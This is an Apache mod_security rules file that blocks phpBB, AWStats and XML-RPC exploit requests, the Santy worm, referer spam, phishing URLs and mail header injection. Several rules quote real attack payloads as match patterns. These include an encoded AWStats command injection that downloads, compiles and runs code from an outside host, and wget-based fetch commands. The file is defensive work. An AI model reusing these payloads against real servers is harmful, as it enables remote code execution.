# referer spam common sites SecFilterSelective "HTTP_REFERER" "(go\.to|get\.to|drop\.to|hey\.to|switch\.to|dive\.to|move\.to|again\.at)" # phpbb exploits SecFilterSelective THE_REQUEST "chr(101)%252echr(99)%252echr(104)" SecFilterSelective THE_REQUEST "chr(99)%252echr(100)%252echr(32)" SecFilterSelective THE_REQUEST "wget%20www.geocities.com/supahacker/bz.tgz" SecFilterSelective THE_REQUEST "addnew&install_to=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./tmp" # awstats exploit SecFilterSelective THE_REQUEST "configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fawsimple%2etripod%2ecom%2fm%2ftest%2ec%3bgcc%20%2do%20nfsiod%20test%2ec%3b%2e%2fnfsiod%3becho%20e_exp%3b%2500" SecFilterSelective THE_REQUEST "configdir=%20%7c" # Protect against phpBB2 Exploits SecFilter "viewtopic\.php\?" chain SecFilter "chr\(([0-9]{1,3})\)" "deny,log" SecFilterSelective HTTP_USER_AGENT "phpBB2 exploit" # Exploit phpBB Highlighting Code Execution Attempt SecFilterSelective THE_REQUEST "&highlight='\.system\(" # Exploit phpBB Highlighting SQL Injection SecFilterSelective THE_REQUEST "&highlight='\.mysql_query\(" # Exploit phpBB Highlighting Code Execution - Santy.A Worm SecFilterSelective THE_REQUEST "&highlight='\.fwrite\(fopen\(" # Exploit phpBB Highlight Exploit Attempt SecFilterSelective ARG_highlight %27 # .info DOS with fake majestic12 user agent (more info at http://www.majestic12.co.uk/projects/dsearch/mj12bot.php) SecFilterSelective HTTP_USER_AGENT "v1\.0\.8.*majestic12\.co\.uk/bot\.php" # Common web exploit SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;wget " SecFilterSelective THE_REQUEST "cmd=cd /tmp; wget " SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;ls;wget " #Specific XML-RPC attacks on xmlrpc.php SecFilterSelective THE_REQUEST "/xmlrpc\.php" chain SecFilter "\<*xml" chain SecFilter "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;" # block common phish site URLs SecFilterSelective THE_REQUEST "aw/eBayISAPI" SecFilterSelective THE_REQUEST "paypal-login" SecFilterSelective THE_REQUEST "paypalmembers" SecFilterSelective THE_REQUEST "paypal.cgi-bin" SecFilterSelective THE_REQUEST "secure.cgi.paypal.com" SecFilterSelective THE_REQUEST "wellsfargo.cgi.bin" SecFilterSelective THE_REQUEST "cgibin-webscr" SecFilterSelective THE_REQUEST "signin.ebay.com" # spammer bcc header injections SecFilterSelective POST_PAYLOAD "bcc:.*@.*" Include /dh/apache2/template/etc/mod_sec_gotroot_exclude.conf Include /dh/apache2/template/etc/mod_sec_gotroot_rootkits.conf Include /dh/apache2/template/etc/mod_sec_gotroot_generic.conf